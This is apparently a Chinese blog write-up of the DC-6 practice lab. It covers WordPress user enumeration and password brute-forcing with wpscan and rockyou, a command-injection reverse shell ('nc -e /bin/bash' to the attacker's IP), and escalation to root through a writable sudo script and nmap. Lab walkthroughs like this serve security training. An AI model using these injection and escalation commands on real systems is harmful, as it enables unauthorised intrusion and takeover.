• DC-6 靶机


    DC_6

    信息搜集

    存活检测

    在这里插入图片描述

    详细扫描

    image-20231023165338741

    需要添加 DNS 解析

    vim /etc/hosts
    
    • 1

    image-20231023165450298

    后台网页扫描

    dirsearch -u http://10.4.7.150
    
    • 1

    image-20231023165740307

    网页信息搜集

    • 使用 wappalyzer 插件识别 cms 指纹,发现为熟悉的 WordPress

      image-20231023172017074

    • 并且发现了网站的登陆页面

      image-20231023172452558

    • 直接上 wpscan

      扫描用户

      wpscan --url http://wordy --enumerate u 
      
      • 1

      扫描出如下用户,将用户写入 users 文件中以供爆破

      image-20231023174329291

    • 尝试 cewl 生成密码字典

      image-20231023174804359

    • 爆破

      image-20231023175229931

    • 爆破失败

      image-20231023175257084

    • rockyou 字典爆破

      image-20231023212103641

      dc6 官网上提示过滤一些密码可以提升爆破速度

      cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt
      
      • 1
      wpscan --url http://wordy --passwords passwords.txt --usernames users
      
      • 1

      image-20231023212303251

    • 成功爆破

      用户名 mark

      密码 helpdesk01

      image-20231023213537470

    • 登录网页

      image-20231023213733116

    Webshell

    • 搜索框内尝试命令注入

      image-20231023214759279

    • kali 开启 nc 监听

      image-20231023214840083

    • 输入连接反弹 shell 的命令

      10.1.1.1|nc -e /bin/bash 10.4.7.146 7777
      
      • 1

      有长度限制

      image-20231023215002694

    • 修改源码中允许的最大长度

      输入反弹命令,点击 Lookup 连接

      image-20231023215429620

    • 成功反弹

      image-20231023215447981

    ssh登录

    • 反弹成功后搜集系统中有用信息

      在 /hoomr/mark/stuff 下发现了包含 graham 密码的文件

      密码为 GSo7isUM1D4

      image-20231023220034640

      尝试 ssh 登录

    • 成功登录

      image-20231023220149331

    提权

    • sudo -l 查看权限

      image-20231023220219626

    • 发现 jens 可以无需密码以 root 权限运行 /home/jens/backups.sh

    • 查看 backup.sh 文件

      image-20231023220904917

      发现是一个压缩命令

    • 查看文件权限

      image-20231023220931296

      所属组拥有全部权限

    • 查看 graham 信息

      image-20231023221450772

      发现与 jens 同属一个组,拥有对文件的修改权限

    • 向文件中写入提权命令

      echo bash >> backups.sh
      
      • 1

      image-20231023221548032

    • sudo 执行

      sudo -u jens /home/jens/backups.sh
      
      • 1

      image-20231023222159317

    • 切换到 jens 用户

      image-20231023222240231

    • sudo -l 查看 root 权限

      image-20231023222319457

    • nmap 提权

      TF=$(mktemp)
      echo 'os.execute("/bin/sh")' > $TF
      sudo nmap --script=$TF
      
      • 1
      • 2
      • 3

      image-20231023223242815

    • 提权成功

      image-20231023223314391

    总结

    • 命令注入,绕过
    • wpscan 用户扫描,密码爆破
    • nmap 提权
  • 相关阅读:
    vue中动态引入图片
    国内的软件测试真的这么不受待见吗?
    POJ2676Sudoku题解
    视频播放 (二) 自定义 MediaPlayer
    前端缓存汇总
    Developer Machines FireSolution调色板实现
    vue2.x与vue3.x中自定义指令详解
    多肽914910-73-9:血管紧张素Angiotensin(1-12)(mouse, rat)
    vue3.0 组件篇 Card
    [读论文] Monocular 3D Object Reconstruction with GAN inversion (ECCV2022)
  • 原文地址:https://blog.csdn.net/weixin_51559599/article/details/134000840